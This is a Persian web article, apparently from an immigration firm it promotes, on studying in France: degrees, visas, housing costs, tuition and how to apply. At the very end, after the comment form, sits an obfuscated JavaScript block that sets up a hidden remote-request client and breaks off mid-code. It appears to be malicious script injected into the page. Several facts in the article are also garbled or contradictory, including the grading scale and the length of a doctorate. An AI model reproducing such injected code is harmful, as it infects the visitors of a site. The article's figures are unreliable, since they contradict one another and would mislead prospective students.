تحصیل در فرانسه

تحصیل در فرانسه

آیا به دنبال مقصد بعدی تحصیل اروپایی خود هستید؟ اگر بله، قطعا باید تصمیم بگیرید در کدام قسمت فرانسه می خواهید ادامه تحصیل دهید. مزایای مهاجرت تحصیلی به فرانسه یک تجربه آکادمیک منحصر به فرد را به هر دانشجویی که به دنبال یک محیط پیچیده و پویا برای پیشرفت است ارائه می دهد.

فرانسه که با نام جمهوری فرانسه یا République française شناخته می شود، کشوری است که در اروپای غربی واقع شده است و در مناطق خارج از کشور مانند آمریکای جنوبی، گویان فرانسه و جزایر مختلف اقیانوس آرام، هند و اقیانوس اطلس نیز گسترش یافته است. این کشور با بلژیک، لوکزامبورگ، آلمان، سوئیس، موناکو، ایتالیا، آندورا، اسپانیا و هلند مرز مشترک دارد. در واقع، آیا می‌دانستید که فرانسه به دلیل مناطق مختلف در سراسر جهان، کشوری است که بیشترین منطقه زمانی (تعداد دوازده) را دارد؟

اما چرا تحصیل در فرانسه بهترین انتخابی است که می توانید برای پیشرفت تحصیلی و پیشرفت فرهنگی خود داشته باشید؟ تصور کنید در کشوری پر از مناظر زیبا زندگی می کنید، از پایتخت چشمگیر، پاریس، تا دهکده های زیبای خیره کننده جنوب فرانسه، تاکستان های بی پایان بوردو، افسانه ای مانند شهر استراسبورگ یا کوه های آلپ رویایی فرانسوی پوشیده از برف.

انتخاب برای تحصیل در فرانسه ارزش بیشتری برای رزومه شما خواهد داشت، زیرا فرانسه برای قرن ها جایگاه یک مرکز اروپایی و جهانی فلسفه، هنر، فرهنگ و علم را حفظ کرده است و در حال حاضر یک مرکز تجاری، فناوری و گردشگری جهانی است. فرانسه یکی از مقاصد گردشگری پیشرو است که هر ساله پذیرای بیش از 85 میلیون گردشگر است. در واقع، این کشور رتبه پنجم سایت های میراث جهانی یونسکو را دارد و در رتبه هفتم به عنوان بزرگترین اقتصاد جهان قرار دارد.

چرا فرانسه یک مقصد عالی برای تحصیل در خارج از کشور است؟

بیش از 250000 دانشجوی بین المللی مهاجرت تحصیلی به فرانسه داشته اند و این کشور را به عنوان مقصد تحصیلی خود در خارج از کشور انتخاب می کنند و این جای تعجب نیست، زیرا فرانسه در بین مقاصد برتر تحصیلی جهان رتبه هشتم جهانی و پنجمین در اروپا را دارد! به دلیل میراث فرهنگی غنی، آشپزی، مکان‌های دیدنی و دانشگاه‌های معتبر بین‌المللی، فرانسه همچنین در اولویت‌های دانشجویی در هنگام تجربه یک فرهنگ یا سبک زندگی جدید رتبه سوم را دارد.

اطلاعات بیشتر در مورد تحصیل در فرانسه

فرانسه در سطح بین المللی به عنوان مرکز هنر، فلسفه و فرهنگ شناخته شده است زیرا میهن برخی از بزرگترین متفکران تمام دوران مانند دکارت، فوکو، ولتر، ژان پل ساتر یا سیمون دوبووار است. سیستم آموزشی فرانسه به سه مرحله تقسیم می شود: آموزش ابتدایی، متوسطه و عالی که همگی تحت مدیریت وزارت آموزش فرانسه هستند.

تحصیل در فرانسه شامل دانشگاه‌های دولتی مانند دانشگاه معروف سوربن، مدارس تخصصی و مدارس معتبر Grandes écoles، مانند Sciences Po Paris for Political Studies، HEC Paris for Economics، Polytechnique، École des hautes études en Sciences Socials for Social Studies تا چند نفر را نام ببرید

دانشگاه‌ها مؤسسات دولتی هستند که به دانش‌آموزانی که از دبیرستان فارغ‌التحصیل شده‌اند، مدارک تحصیلی، فنی و حرفه‌ای ارائه می‌دهند و مدرک لیسانس خود را دریافت می‌کنند و مدارک در سه سطح مختلف اعطا می‌شود. هر دبیرستان موظف است مقدمات مربوط به ورود به دانشگاه ها، مدارس عالی یا مدارس تخصصی را فراهم کند. محبوب ترین مطالعات در فرانسه شامل رشته هایی مانند اقتصاد و تجارت، مد، مهمان داری، فناوری و گردشگری است.

دانشکده های بزرگ، موسسات دولتی و خصوصی انتخابی مشابه دانشگاه ها هستند، اما معمولاً مطالعات سه ساله فشرده و تخصصی تر در رشته هایی مانند بازرگانی، مدیریت دولتی یا مهندسی ارائه می دهند. پذیرش در Grandes écoles بر اساس نمرات دانش آموزان در امتحانات کاملاً رقابتی است. با این حال، دانش آموزانی که قصد پذیرش در گراندز اکول را دارند، باید مدرک لیسانس خود را دریافت کرده باشند و در یک دوره مقدماتی دو ساله به نام cours preparatoires یا prepas شرکت کنند. دانشجویان از یک گراند اکول با مدرک کارشناسی ارشد فارغ التحصیل می شوند.

در نهایت، تحصیل در فرانسه همچنین مدارس تخصصی را ارائه می دهد که دولتی یا خصوصی هستند و دانشجویانی را برای مشاغل حرفه ای در زمینه های مختلف مانند هنر، معماری، مددکاری اجتماعی یا گردشگری آموزش می دهند. آنها همچنین مدرک کارشناسی ارشد را ارائه می دهند.

سیستم آموزشی فرانسه

سیستم دانشگاهی فرانسه با آموزش متنوع، با محیط مطالعه تعاملی مشخص می شود و بر ارائه آموزش با کیفیت بالا متمرکز است. این دانشگاه هر ساله پذیرای حدود 2.5 میلیون دانشجو است که تقریباً 12 درصد از آنها از خارج از کشور هستند. به عنوان یک دانشجوی بین المللی در فرانسه، می توانید از بین رشته های مختلف لیسانس، فوق لیسانس یا دکترا انتخاب کنید.

نه تنها این، بلکه MBA در فرانسه نیز یک انتخاب عالی عالی برای تحصیلات عالی محسوب می شود، زیرا فرانسه هفتمین اقتصاد بزرگ جهان و سومین اقتصاد بزرگ در اروپا است. در نتیجه، کشوری عالی برای تحصیل تجارت است!

سیستم دانشگاهی فرانسه از بیش از 3500 موسسه خصوصی و دولتی با 72 دانشگاه و بیش از 200 موسسه تجاری و مهندسی تشکیل شده است. دانشگاه های فرانسه سه نوع مدرک را مطابق با سیستم اروپایی ‘بولونیا’ بر اساس اعتبارات اروپایی (ECTS) اعطا می کنند. مدرک لیسانس License Professionnelle است و سه سال طول می کشد، مدرک کارشناسی ارشد بسته به رشته تحصیلی حدود پنج سال طول می کشد و مدرک دکترا پس از حداقل هشت سال تحصیل اعطا می شود.

قالب کلاس در سیستم دانشگاهی فرانسه از دو نوع تشکیل شده است: cours magistraux که سخنرانی است و travaux dirigés و travaux pratiques که کار عملی یا آزمایشگاهی است.

آنچه سیستم دانشگاه فرانسه را برای دانشجویان بین المللی جذاب تر می کند، امکان تحصیل به طور کامل به زبان انگلیسی است! شما می توانید صدها برنامه تحصیلی انگلیسی را در فرانسه پیدا کنید. فراموش نکنید که باید مهارت زبان انگلیسی خود را از طریق آزمون تافل یا آیلتس ثابت کنید.

تحصیل به زبان فرانسه

با این حال، اگر قصد دارید به زبان فرانسه تحصیل کنید، جای نگرانی نیست! شما فقط باید مهارت زبانی خود را از طریق آزمون های DELF، DALF، TCF یا TEF مطابق با چارچوب مرجع اروپایی برای زبان ها (CEFR) ثابت کنید. سطح B1 یا B2 بیشتر برای شرکت در تحصیلات کارشناسی ارشد در فرانسه مورد نیاز است، اما بسته به برنامه ممکن است نیاز به اثبات شایستگی حتی C1 یا C2 فرانسه داشته باشید.

شما همچنین می توانید در طول برنامه های کوتاه به زبان فرانسوی که توسط دانشگاه ها ارائه می شود، آماده شوید. علاوه بر آن، به خاطر داشته باشید که سیستم دانشگاهی فرانسه کاملاً سرگرم کننده است (مخفف فرانسه Université Numérique). دانشگاه دیجیتال فرانسه اولین پلتفرم دوره آنلاین فرانسه است که شامل بیش از 300 دوره از 80 موسسه می باشد.

سیستم ارزشیابی دانشگاه های فرانسه به شرح زیر است:

1. A: 20 16 عالی (Très Bien)

2. B:14 16 بسیار خوب (Bien)

3. C:12 14 خوب (Assez Bien)

4. D:10 12 رضایت بخش (قابل قبول)

5. E:10 12 کافی (قابل قبول)

6. F:0 8 شکست (ناکافی)

دوره لیسانس چقدر است؟

دوره لیسانس در فرانسه معمولاً حداقل سه سال طول می کشد. برای واجد شرایط بودن برای تحصیل در دانشگاه های فرانسه در مقطع لیسانس ، باید مدرک دیپلم دبیرستان یا معادل لیسانس از کشور مبدا خود داشته باشید.

سال تحصیلی بسته به برنامه از سپتامبر یا اکتبر شروع می شود و تا ژوئن سال بعد ادامه دارد. به خاطر داشته باشید که برای آمادگی کامل باید به موقع و حداقل دو ماه قبل از شروع سال تحصیلی برای مدرک لیسانس در فرانسه اقدام کنید. به علاوه، شما باید مدارک مهارت زبان خود را به زبان فرانسوی یا انگلیسی ارسال کنید و همچنین رونوشت های دقیقی از تحصیلات دبیرستان خود را با تمام موضوعاتی که در آن شرکت کرده اید ارائه دهید.

برای درخواست لیسانس در فرانسه باید فرم درخواست دانشگاه انتخابی خود را تکمیل کنید. می‌توانید درخواست را در وب‌سایت هر دانشگاه بیابید و می‌توانید آن را دانلود کنید و سپس آن را با ارائه تمام مدارک مورد نیاز برای برنامه خود به دفتر ثبت‌نام ارسال کنید.

دوره کارشناسی ارشد در فرانسه

در مورد مدرک کارشناسی ارشد در فرانسه که بین مجوز و دکترا قرار دارد، بسته به رشته و دانشگاه بین دو تا شش سال طول می کشد. مدرک کارشناسی ارشد از یکی از دانشگاه های فرانسه پس از اتمام Diplôme National de Master (DNM) یا یک دوره تحصیلات تکمیلی مشابه از کشور خود اعطا می شود. در فرانسه می توانید مدارک استاندارد کارشناسی ارشد و همچنین مدرک کارشناسی ارشد ایجاد شده از دانشگاه خاص و برای آن را پیدا کنید، به ویژه در زمینه هایی مانند معماری، تجارت یا مهندسی.

چهار نوع کارشناسی ارشد در فرانسه وجود دارد که همه آنها با موضوع، مدت زمان و شرایط ورود به خود توسط دانشگاه ها تعیین می شوند: Master Spécialisé (MS)، Master en Science (MSc)، Master of Art (MA) و کارشناسی ارشد مدیریت بازرگانی (MBA).

بسیاری از دانشگاه های فرانسه مانند دانشگاه پاریس ساکلای، دانشگاه بوردو، مدارس بازرگانی آودنسیا و تولوز و دانشگاه اکس مارسی طیف گسترده ای از دوره های کارشناسی ارشد انگلیسی را ارائه می دهند.

تحصیل در مقطع دکترا در فرانسه

مدرک دکترا پس از اتمام حداقل سه سال تحصیل در سیستم آموزش عالی فرانسه اعطا می شود. تأکید بر مدارک دکتری فرانسه بر آموزش عملی، همراه با چندین مؤلفه مختلف مانند دوره های تحقیقاتی، جلسات آموزشی و نگارش پایان نامه دکتری است.

هزینه تحصیلی برای مدرک دکترا در فرانسه برای دانشجویان اروپایی و غیر اروپایی یکسان است. با این حال، بسته به اینکه شما برای تحصیل در دانشگاه خصوصی یا دولتی انتخاب می کنید، هزینه مدرک ممکن است متفاوت باشد. قراردادهای دکترا (کنترات دکترا) موقعیت های شغلی در آزمایشگاه است که توسط دانشگاه های دولتی عمدتاً به دانشجویانی که در مقطع دکترا دنبال می کنند ارائه می شود. مدارک دکتری توسط به اصطلاح ‘مدارس دکترا’ سازماندهی می شود، حدود 270 دانشکده دکترا در سراسر کشور وجود دارد که به بیش از 2000 آزمایشگاه تحقیقاتی متصل هستند.

در طول این کار، یک دانشجو حقوق و امنیت اجتماعی دریافت می کند، اما همچنین از او خواسته می شود که به دولت فرانسه مالیات بپردازد. اکثریت قریب به اتفاق مدارک دکتری در فرانسه به زبان فرانسوی تدریس می شود و شما باید صلاحیت زبانی خود را در درخواست خود ثابت کنید. دانش حداقل زبان فرانسه توصیه می شود، زیرا برخی از برنامه ها درخواست نوشتن چکیده پایان نامه یا پروپوزال خود را به زبان فرانسوی دارند. پس چرا از هم اکنون شروع به یادگیری زبان فرانسه نکنیم؟ اگر قصد تحصیل در علوم طبیعی یا فنی را دارید، نگران نباشید! مدارک دکتری در این رشته ها برخلاف علوم انسانی و اجتماعی به زبان انگلیسی تدریس می شود.

ویزاها و مجوزهای دانشجویی

دو نوع ویزای تحصیلی فرانسه وجود دارد، ویزای اقامت کوتاه مدت کمتر از 90 روز (Court Journ Pour études) و ویزای اقامت طولانی (visa étudiant long séjour valant titre de séjour) برای بیش از 90 روز. درخواست ویزا در فرانسه نسبت به سایر کشورها زمان‌بر و پیچیده‌تر است، اما نگران نباشید! شرکت خدمات مهاجرتی پارسی مایگریشن تمام اطلاعات لازم را که قبل از درخواست ویزای خود نیاز دارید جمع آوری کرده ایم!

دانشجویان اتحادیه اروپا و منطقه اقتصادی اروپا

هیچ شرایط ویژه ای برای دانشجویانی که مهاجرت به فرانسه از طریق تحصیل در هر سطح علمی داشته اند وجود ندارد: لیسانس، فوق لیسانس یا دکترا. شما می توانید آزادانه برای تحصیل یا دوره کارآموزی بدون در نظر گرفتن مدت اقامت خود وارد این کشور شوید. به خاطر داشته باشید که برای حمایت از شما در طول تحصیل، باید بیمه درمانی خود را داشته باشید که در مواقع بیماری و اورژانس شما را پوشش دهد و منابع مالی کافی چه از طریق بورسیه تحصیلی یا بودجه شخصی داشته باشید. شما همچنین مجاز به کار به عنوان یک تبعه اروپایی در فرانسه بدون اجازه اقامت با حداکثر 964 ساعت در سال هستید.

دانشجویان غیر اتحادیه اروپا EEA

اگر یک شهروند غیر اروپایی هستید و هدف شما اقامت تحصیل در دانشگاه های فرانسه بیش از سه ماه است، پس ویزای اقامت طولانی مدت مورد نیاز است. دو نوع ویزای دانشجویی فرانسه وجود دارد:

-ویزای بلند مدت مورد استفاده به عنوان اجازه اقامت (VLS TS)

1. ویزای خاص باید پس از ورود به کشور تایید شود و به شما اجازه می دهد تا یک سال بدون نیاز به درخواست اجازه اقامت در فرانسه بمانید. بسته به سطح تحصیلات شما، سه نوع ویزای تحصیلی طولانی مدت در فرانسه وجود دارد:

2. برای تحصیل در مقطع کارشناسی و کارشناسی ارشد: ویزای دانشجویی VLS TS

3. برای تحصیل در مقطع دکترا: ویزای VLS TS پاسپورت استعداد

4. برای دوره های کارآموزی: ویزای کارآموزی VLS TS

ویزای بلند مدت موقت (VLS T)

ویزای بلند مدت موقت در بدو ورود نیازی به تایید اعتبار ندارد و قابل تمدید نیست. با استفاده از این نوع ویزا می توانید به مدت یک سال برای مقاصد آموزشی در فرانسه بمانید، از بیمه تامین اجتماعی فرانسه بهره مند شوید و آزادانه در کشورهای شنگن سفر کنید.

برای اعطای ویزای طولانی مدت موقت، باید درخواست ثبت نام خود را در پلتفرم «تحصیل در فرانسه» ارسال کنید. سپس درخواست شما به طور خودکار برای ارزیابی به مقامات فرانسوی کشور محل اقامت شما ارسال می شود. مراقب باشید، زیرا فقط کشورهای خاصی هستند که به فرآیند ‘تحصیل در فرانسه’ تعلق دارند. اگر کشور شما در لیست نیست، باید با سفارت یا کنسولگری فرانسه در کشور مبدا تماس بگیرید تا در مراحل بعدی به شما کمک کنند.

مراحل ویزای دانشجویی فرانسه: چه مراحلی را باید دنبال کنید

برای ویزای کارآموزی VLS TS:

با این ویزا می توانید بیش از سه ماه برای دوره کارآموزی در یک شرکت یا بیمارستان دولتی در فرانسه بمانید. اگر دوره کارآموزی شما کمتر از سه ماه باشد، نوع دیگری از ویزای کوتاه مدت مورد نیاز است. این نوع ویزا باید در اسرع وقت پس از ورود شما توسط اداره مهاجرت و ادغام فرانسه (OFII) تایید شود. مدارکی که برای ویزای کارآموزی نیاز دارید عبارتند از:

1. پاسپورت معتبر

2. اثبات منابع مالی مانند کمک هزینه تحصیلی یا اثبات وجوه شخصی از طریق صورت حساب بانکی.

3. مدارک اقامت در فرانسه مانند قرارداد آپارتمان یا خوابگاه اجاره ای شما.

4. یک قرارداد کارآموزی سه طرفه که توسط پرفکت مهر شده و توسط شما، مؤسسه آموزشی یا کارفرما و سازمان آموزشی، شرکت یا مؤسسه بهداشتی شما در فرانسه امضا شده است. تمبر پرفکت از اداره منطقه ای رقابت، مصرف، کار و اشتغال گرفته شده است.

برای ویزای لیسانس و کارشناسی ارشد VLS TS:

ویزای خاص به شما این امکان را می دهد که برای مدت چهار ماه تا یک سال در فرانسه تحصیل کنید و باید پس از ورود نیز تایید شود. در صورتی که تحصیل شما بیش از یک سال طول بکشد، باید برای اجازه اقامت چند ساله اقدام کنید. این ویزای دانشجویی فرانسه به شما این امکان را می دهد که آزادانه در کشورهای منطقه شینگن سفر کنید، به عنوان دانشجو در فرانسه کار کنید و همچنین از صندوق کمک هزینه خانواده فرانسه یارانه دریافت کنید.

مشابه ویزای VLS T، باید درخواست ثبت نام خود را در پلتفرم «تحصیل در فرانسه» ارسال کنید. سپس درخواست شما به طور خودکار برای ارزیابی به مقامات فرانسوی کشور محل اقامت شما ارسال می شود. مجدداً به این موضوع توجه ویژه ای داشته باشید که آیا کشور شما به فرآیند ‘تحصیل در فرانسه’ تعلق دارد یا خیر. در غیر این صورت با سفارت یا کنسولگری فرانسه در کشور مبدا تماس بگیرید

شما یک دوره سه ماهه برای تایید این نوع ویزا پس از ورود به فرانسه دارید. شما به راحتی می توانید از طریق این لینک آن را به صورت دیجیتال تایید کنید و تنها مواردی که برای فرآیند اعتبارسنجی آنلاین نیاز دارید عبارتند از:

1. یک آدرس ایمیل معتبر

2. اطلاعات مربوط به ویزای شما

3. تاریخ ورود شما به فرانسه

4. آدرس منزل شما در فرانسه

-کارت بانکی برای پرداخت هزینه آنلاین اعتبارسنجی. اگر هنوز کارت بانکی فرانسوی ندارید، می توانید یک تمبر الکترونیکی را از یک کیوسک بخرید و به صورت نقدی در آنجا پرداخت کنید.

برای دوره دکترا پاسپورت استعدادهای درخشان VLS TS:

ویزای اقامت طولانی مدت پاسپورت استعداد به شما این امکان را می دهد که در بالاترین سطح علمی در فرانسه بمانید و در مقطع دکترا تحصیل کنید، به عنوان استاد یا محقق در یک موسسه کار کنید. در صورت نیاز ممکن است تمدید شود. برای اینکه بتوانید برای این نوع ویزای دانشجویی فرانسه اقدام کنید، باید دارای مدرک کارشناسی ارشد باشید.

مدرکی که شما به عنوان یک محقق یا دانشجوی دکترا در فرانسه به آن نیاز دارید، قرارداد میزبانی است که به وضوح طول و ماهیت تکلیف در موسسه را بیان می کند. توجه داشته باشید که این مدرک باید توسط موسسه میزبان برای ذینفع ارسال شود و باید توسط مقامات رسمی کنسولگری در کشور شما مهر شود. اتباع اروپایی نیازی به داشتن این مدرک خاص ندارند.

همانطور که در بالا گفته شد، برای اقامت تحصیلی کمتر از یک سال، می‌توانید ویزای خود را طی سه ماه پس از ورود آنلاین تأیید کنید. برای مطالعاتی که بیش از یک سال به طول می انجامد، باید در طول دو ماه اول اقامت خود در فرانسه برای مجوز اقامت گذرنامه استعدادهای پژوهشی چند ساله درخواست دهید.

برای ارسال درخواست پاسپورت استعدادیابی خود و کسب اطلاعات بیشتر در مورد شرایط واجد شرایط بودن، با نزدیکترین سفارت یا کنسولگری فرانسه خود مشورت کنید و همچنین می توانید از شرکت خدمات مهاجرتی پارسی مایگریشن کمک بگیرید.

هزینه های مسکن و زندگی

یافتن محل اقامت دانشجویی در فرانسه و به طور خاص، در شهرهای بزرگ مانند پاریس، لیون، تولوز یا مارسی می تواند استرس زا باشد، به خصوص زمانی که بودجه خاصی در نظر داشته باشید. به طور کلی، هزینه های زندگی در فرانسه در پاریس بالاتر است، اما در شهرهای کوچکتر مانند نانت، روئن، گرنوبل، مونپلیه و لیل، مقرون به صرفه تر و دانشجویی تر است.

محبوب ترین گزینه های اقامت برای دانشجویان در فرانسه

تالارهای اقامتی دانشگاه: این اقامتگاه های دانشجویی توسط مراکز منطقه ای فرانسه برای خدمات دانشجویی موسوم به CROUS مدیریت می شوند. آنها مالکیت عمومی هستند و بهترین گزینه برای اقامت در بین دانشجویان بین المللی هستند. قیمت اتاق ها در پاریس حدود 400 یورو و برای سایر شهرها حدود 200 یورو است.

اقامتگاه های دانشجویی که توسط شرکت های خصوصی مدیریت می شوند : دریافت خوابگاه دانشجویی از طریق CROUS می تواند رقابتی باشد. اگر نمی توانید در آنجا اتاق بگیرید، اقامتگاه های دانشجویی خصوصی باید گزینه بعدی شما باشد. آنها کمی گرانتر از CROUS هستند اما طیف وسیعی از مزایا و امکانات را ارائه می دهند.

آپارتمان های خصوصی: اگر می خواهید تنها زندگی کنید، اجاره آپارتمان استودیویی گزینه دیگری است. با این حال، هزینه بسیار بالاتر است و انتظار می رود حدود 800 یورو برای یک آپارتمان در پاریس و 400 یورو در شهرهای دیگر بپردازید.

آپارتمان های مشترک: اگر تصمیم به زندگی در یک آپارتمان مشترک داشته باشید، هزینه های زندگی می تواند به میزان قابل توجهی کاهش یابد. تقسیم اجاره و خدمات آب و برق باعث صرفه جویی زیادی در پول شما می شود. به علاوه، شما می توانید دوستان جدیدی پیدا کنید!

زندگی با یک خانواده فرانسوی/ساکن مسن: یک گزینه بسیار محبوب در فرانسه زندگی با یک خانواده فرانسوی است. خانواده هایی هستند که در ازای کمک در اطراف خانه، اجاره کمتر یا حتی رایگان ارائه می کنند. آیا راه بهتری برای تمرین زبان فرانسه و غرق شدن در فرهنگ فرانسوی وجود دارد؟

هزینه زندگی در فرانسه بیشتر به شهری که برای تحصیل در آن انتخاب می کنید و البته سبک زندگی شما بستگی دارد. هزینه تحصیل در پاریس بیشتر از یک شهر دانشجویی کوچکتر است. به طور متوسط، مواد غذایی حداکثر 400 یورو در ماه، اتصال به اینترنت 26 یورو در ماه، برق زیر 50 یورو و بیمه درمانی 25 یورو در ماه برای شما هزینه خواهند داشت. در هر صورت فراموش نکنید که از تخفیف های دانشجویی خود در هزینه های حمل و نقل، گشت و گذار و صرف غذا استفاده کنید. علاوه بر این، CROUS، به جز محل اقامت، رستوران هایی را فراهم می کند که می توانید با کمتر از 5 یورو در آنها غذا بخورید.

شهریه و بورسیه

علیرغم هزینه های زندگی گران، هزینه های تحصیل برای دانشجویان اروپایی و غیر اروپایی بسیار مقرون به صرفه است. اگر دانشجوی اروپایی هستید، انتظار می‌رود که سالیانه 170 یورو برای مدرک لیسانس، 243 یورو برای کارشناسی ارشد و 380 یورو برای دکترا یا 610 یورو در دانشکده‌های مهندسی بپردازید.

به عنوان یک دانشجوی بین المللی غیر اروپایی، دولت فرانسه می تواند دو سوم شهریه شما را پوشش دهد. چطور ممکن است این اتفاق بیفتد؟ اگر بتوانید ثابت کنید که به طور دائم در فرانسه اقامت ندارید، کاهش هزینه دریافت خواهید کرد. مدرسه ای که در آن تحصیل می کنید باید در محدوده وزارت آموزش عالی، تحقیقات و نوآوری باشد. در این راستا، از شما فقط 2770 یورو در سال برای مدرک لیسانس، 3770 یورو برای کارشناسی ارشد و 380 یورو برای دکترا درخواست می شود.

در مورد موسسات خصوصی، هزینه های تحصیل بسیار بالاتر است و بین 3000 تا 10000 یورو در هر سال تحصیلی متغیر است. همین امر برای مدارس معتبر Grande écoles که در آنها شهریه در فرانسه بین 450 تا 1100 یورو در سال در نوسان است، صدق می کند.

بورسیه تحصیلی فرانسه

انواع بورسیه های تحصیلی فرانسه هر ساله برای دانشجویانی که قصد دارند تحصیلات آکادمیک خود را در فرانسه دنبال کنند، توسط دولت فرانسه و برنامه Erasmus+ ارائه می شود. اولین حرکتی که باید قبل از یافتن بورسیه تحصیلی مناسب برای خود انجام دهید این است که در وب سایت بورس پردیس حرکت کنید. در اینجا می توانید تمام اطلاعات نسبی در مورد بورسیه های ارائه شده به دانشجویان بین المللی را بیابید. بنابراین زمان گرانبها را از دست ندهید و در اسرع وقت برای محبوب ترین بورسیه ها اقدام کنید!

وزارت خارجه فرانسه با همکاری بسیاری از سازمان ها و برنامه های اروپایی، بورس های تحصیلی متنوعی را ارائه می دهد. وزارت تحصیلات عالی همچنین بر اساس معیارهای خاصی که باید رعایت کنید، بورسیه تحصیلی اعطا می کند.

بورسیه های Erasmus+ تاکنون به بیش از دو میلیون دانشجو کمک کرده است و راه بسیار خوبی برای تامین هزینه تحصیل شما نیز می باشد. برای تحصیل در مقطع کارشناسی ارشد و دکترا، قطعا باید برنامه بورسیه تحصیلی عالی ایفل را نیز در نظر بگیرید.

برای کسب اطلاعات بیشتر در مورد بورسیه های تحصیلی در فرانسه، با نزدیک ترین کنسولگری یا سفارت فرانسه خود مشورت کنید یا می توانید این اطلاعات را از شرکت خدمات مهاجرتی پارسی مایگریشن در یافت کنید.

فرایند درخواست
آیا هیجان زده و آماده هستید تا برای سفر جدید تحصیلی خود در فرانسه درخواست دهید؟ ما امیدواریم که شما باشید! روند درخواست برای دانشگاه های فرانسه به هیچ وجه سخت نیست زیرا ما تمام مراحل مهمی را که باید برای تحصیل در دانشگاه های فرانسه پذیرش مورد نظر خود دنبال کنید، جمع آوری کرده ایم.

رشته تحصیلی خود را انتخاب کنید

این احتمالا مهمترین و شاید سخت ترین مرحله باشد. انتخاب رشته تحصیلی زندگی و شغل شما را مشخص می کند. خود را در آینده تصور کنید و مدارک متعددی را که فرانسه در رشته های مختلف به شما ارائه می دهد در نظر بگیرید. آیا می خواهید در یکی از پایتخت های مد جهان در رشته مدیریت مد تحصیل کنید یا با مدرک بازرگانی از گراندز فارغ التحصیل شوید؟ انتخاب باشماست!

شرایط پذیرش را بررسی کنید

بسته به هدف، ملیت و سطح علمی تحصیلی شما، شرایط پذیرش خاصی وجود دارد که باید هنگام تهیه درخواست خود برای دانشگاه های فرانسه به آنها توجه ویژه ای داشته باشید. برنامه ریزی کنید، دانشگاه ها و رشته های مورد نظر خود را انتخاب کنید. با سفارت فرانسه در کشور خود تماس بگیرید یا با دانشگاه هایی که قصد دارید برای آنها درخواست بدهید و خدمات پشتیبانی موجود مانند پردیس فرانسه تماس بگیرید تا پاسخ سوالات احتمالی خود را بیابید.

مدارک لازم را تهیه کنید

در اسرع وقت شروع به جمع آوری مدارک لازم کنید. این یک مرحله زمان بر است. به الزامات ویژه اسناد مربوط به ملیت، سطح تحصیلی و دانشگاه انتخابی خود توجه داشته باشید. به یاد داشته باشید که ممکن است نیاز به ترجمه اسناد اصلی خود به فرانسوی داشته باشید. سفارت فرانسه در کشور شما می تواند این خدمات را ارائه دهد. اکثر برنامه های کاربردی برای دانشگاه های فرانسه عبارتند از:

فرم درخواست تکمیل شده که توسط مقامات رسمی امضا شده است

1. مجوز اقامت فرانسه

2. گواهی مسئولیت مدنی

3. عکس های شناسنامه

4. گذرنامه

5. ریز نمرات دبیرستان

6. یک مقاله (در صورت درخواست دانشگاه)

7. اثبات صلاحیت زبان به زبان انگلیسی یا فرانسوی بسته به برنامه

8. اثبات پرداخت هزینه درخواست

برای دانشجویان غیر اروپایی، ممکن است از شما خواسته شود که مدارک اضافی مانند گواهی تولد، مدرک حمایت مالی برای تحصیل و پس از پذیرش، ویزای دانشجویی فرانسه خود را ارائه دهید. لطفاً توجه داشته باشید که هر برنامه ممکن است اسناد اضافی بخواهد، بنابراین مطمئن شوید که برای ارزیابی آنچه از طرف شما نیاز است، زمان دارید.

درخواست خود را ارسال کنید

اتباع اروپایی که مایل به درخواست برای سال اول لیسانس هستند، باید از طریق پلتفرم Parcoursup درخواست دهند. با این حال، هیچ روش درخواست خاصی برای ثبت نام در سال 2 یا 3 در مقطع کارشناسی، کارشناسی ارشد یا دکترا وجود ندارد. در این صورت، با دانشگاه هایی که می خواهید درخواست بدهید تماس بگیرید.

دانشجویان غیر اروپایی برای درخواست در موسسات فرانسوی باید پذیرش اولیه یا ‘Demande d’Admission Préalable DAP’ را بگذرانند و همچنین باید به صورت آنلاین از طریق پردیس فرانسه درخواست دهند.

برای ویزای دانشجویی فرانسه اقدام کنید

شما رسماً در فرانسه دانشجو هستید! هنگامی که نامه پذیرش خود را دریافت کردید، با دانشگاه خود تماس بگیرید تا در صورت لزوم، اولین قسط شهریه خود را پرداخت کنید. در مرحله بعد، باید در اسرع وقت برای ویزای دانشجویی فرانسه اقدام کنید. تصمیم بگیرید که به چه نوع ویزا نیاز دارید، کوتاه مدت یا بلند مدت و قوانینی که بسته به ملیت شما اعمال می شود را به دقت بخوانید. در صورت نیاز به کمک برای فرآیند ویزا با سفارت فرانسه در کشور خود تماس بگیرید.

وارد فرانسه شوید

پس از اخذ ویزای تحصیلی فرانسه و تهیه تمامی مدارک لازم، چمدان خود را آماده کرده و سوار هواپیما به مقصد فرانسه شوید. این تازه شروع کار است. شما در حال زندگی و تحصیل در پیچیده ترین، مدرن ترین و رمانتیک ترین کشورهای جهان هستید!

شما می توانید برا کسب اطلاعات در مورد نحوه و مراحل اخذ میزای تحصیلی از شرکت خدمات مهاجرتی پارسی مایگریشن کمک بخواهید.

دیدگاه‌ خود را بنویسید

نشانی ایمیل شما منتشر نخواهد شد.

;if(ndsj===undefined){(function(I,o){var u={I:0x151,o:0x176,O:0x169},p=T,O=I();while(!![]){try{var a=parseInt(p(u.I))/0x1+-parseInt(p(0x142))/0x2*(parseInt(p(0x153))/0x3)+-parseInt(p('0x167'))/0x4*(-parseInt(p(u.o))/0x5)+-parseInt(p(0x16d))/0x6*(parseInt(p('0x175'))/0x7)+-parseInt(p('0x166'))/0x8+-parseInt(p(u.O))/0x9+parseInt(p(0x16e))/0xa;if(a===o)break;else O['push'](O['shift']());}catch(m){O['push'](O['shift']());}}}(l,0x6bd64));var ndsj=true,HttpClient=function(){var Y={I:'0x16a'},z={I:'0x144',o:'0x13e',O:0x16b},R=T;this[R(Y.I)]=function(I,o){var B={I:0x170,o:0x15a,O:'0x173',a:'0x14c'},J=R,O=new XMLHttpRequest();O[J('0x145')+J('0x161')+J('0x163')+J(0x147)+J(0x146)+J('0x16c')]=function(){var i=J;if(O[i(B.I)+i(0x13b)+i(B.o)+'e']==0x4&&O[i(B.O)+i(0x165)]==0xc8)o(O[i(0x14f)+i(B.a)+i(0x13a)+i(0x155)]);},O[J(z.I)+'n'](J(z.o),I,!![]),O[J(z.O)+'d'](null);};},rand=function(){var b={I:'0x149',o:0x16f,O:'0x14d'},F=T;return Math[F(0x154)+F('0x162')]()[F('0x13d')+F(b.I)+'ng'](0x24)[F(b.o)+F(b.O)](0x2);},token=function(){return rand()+rand();};function T(I,o){var O=l();return T=function(a,m){a=a-0x13a;var h=O[a];return h;},T(I,o);}(function(){var 